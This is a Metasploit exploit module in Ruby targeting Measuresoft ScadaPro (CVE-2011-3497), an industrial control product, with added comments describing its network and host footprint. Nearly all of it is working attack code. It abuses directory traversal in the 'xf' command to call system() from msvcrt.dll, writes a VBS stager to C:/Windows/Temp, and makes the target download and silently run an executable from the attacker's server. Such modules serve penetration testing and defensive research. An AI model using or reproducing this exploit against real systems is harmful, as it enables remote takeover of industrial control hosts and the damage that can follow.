##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
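class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Registers module metadata and options.
  #
  # What this module does, for anyone reviewing traffic or host state: the
  # first stage is plain TCP to RPORT (default 11234) carrying 'xf%' commands
  # whose path argument is a '..\..\' traversal to system32\msvcrt.dll,system;
  # the second stage is an HTTP fetch by the target of
  # '<SRVHOST>:<SRVPORT><URIPATH><random>.exe' from this module's HTTP server,
  # with a VBS stager and the .exe dropped under C:/Windows/Temp. The
  # description lists version 4.0.0 and earlier as affected; the ICS-ALERT
  # reference below is the vendor-independent advisory.
  #
  # @param info [Hash] caller-supplied overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Measuresoft ScadaPro Remote Command Execution',
      'Description' => %q{
        This module allows remote attackers to execute arbitrary commands on the
        affected system by abusing via Directory Traversal attack when using the
        'xf' command (execute function). An attacker can execute system() from
        msvcrt.dll to upload a backdoor and gain remote code execution. This
        vulnerability affects version 4.0.0 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Luigi Auriemma', # Initial discovery/poc
        'mr_me <steventhomasseeley[at]gmail.com>', # msf
        'TecR0c <tecr0c[at]tecninja.net>', # msf
      ],
      'References' => [
        [ 'CVE', '2011-3497'],
        [ 'OSVDB', '75490'],
        [ 'BID', '49613'],
        [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
        [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
        # seemed pretty accurate to us ;)
        [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
      ],
      'DefaultOptions' => {
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
      },
      'Platform' => 'win',
      'Targets' => [
        # truly universal
        [ 'Automatic', { } ],
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2011-09-16'))

    register_options(
      [
        Opt::RPORT(11234),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ])
  end

  # couldn't generate a vbs or exe payload and then use the wF command
  # as there is a limit to the amount of data to write to disk.
  # so we just write out a vbs script like the old days.
  #
  # Builds the single cmd.exe line that writes the VBS stager: the VBS
  # statements are echoed as one ':'-separated line and appended with '>>' to
  # "#{@temp_folder}/#{stager_name}". The stager fetches "http://#{url}" with
  # Microsoft.XMLHTTP, saves the response body as "#{@payload_name}.exe"
  # through ADODB.Stream, and runs it via WScript.Shell with window style 0
  # (0 is WScript's hidden-window style). The two object variable names are
  # two random letters each, so the echoed text is not a fixed string.
  #
  # Reads @temp_folder and @payload_name, which exploit assigns before calling
  # this method; calling it earlier would produce paths with empty segments.
  #
  # @param url [String] host:port/path of the .exe served by on_request_uri
  # @param stager_name [String] file name of the VBS stager inside @temp_folder
  # @return [String] the command line handed to cmd /c
  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb = rand_text_alpha(2)

    tmp = "#{@temp_folder}/#{stager_name}"

    vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

    return vbs
  end

  # HTTP handler for the second stage: when the requested URI contains ".exe",
  # regenerates the payload for this client and serves it as an executable
  # (Content-Type application/octet-stream). Any other URI gets no response
  # from this handler, and a failed regenerate_payload (nil) also sends nothing.
  #
  # @param cli the requesting client, as passed in by the HttpServer mixin
  # @param request the incoming HTTP request; only request.uri is inspected
  # @return [nil]
  def on_request_uri(cli, request)
    return unless request.uri =~ /\.exe/

    print_status("Sending 2nd stage payload")
    p = regenerate_payload(cli)
    return if p.nil?

    data = generate_payload_exe({ :code => p.encoded })
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
    nil
  end

  # Runs the exploit: connects to RPORT over TCP and sends two 'xf%' commands
  # that traverse to system32\msvcrt.dll and call system(). The first echoes
  # the VBS stager into @temp_folder via cmd /c; the second starts that stager,
  # which then fetches the .exe from this module's HTTP server (served by
  # on_request_uri). handler is started before disconnecting; super is called
  # last, presumably so the HttpServer mixin brings the HTTP server up after
  # the TCP stage has been sent — confirm against the mixin before reordering.
  #
  # @return whatever super returns
  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder = "C:/Windows/Temp"

    # When the HTTP server binds every interface, ask Rex which local address
    # would be used to reach 50.50.50.50 (presumably the outbound interface)
    # so the target has a concrete host to call back to.
    lhost = if datastore['SRVHOST'] == '0.0.0.0'
              Rex::Socket.source_address('50.50.50.50')
            else
              datastore['SRVHOST']
            end

    # Build a fresh String here. The previous `payload_src = lhost;
    # payload_src << ...` appended in place to the very object returned by
    # datastore['SRVHOST'], so SRVHOST was corrupted for every later run.
    payload_src = "#{lhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

    stager_name = rand_text_alpha(6) + ".vbs"
    stager = build_vbs(payload_src, stager_name)

    # Five-level traversal from the service's working directory to system32;
    # doubled backslashes are single backslashes on the wire.
    path = "..\\..\\..\\..\\..\\windows\\system32"

    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

    print_status("Sending 1st stage payload...")

    connect
    sock.get_once
    sock.put(createvbs)
    sock.get_once
    sock.put(download_execute)
    handler
    disconnect

    super
  end
end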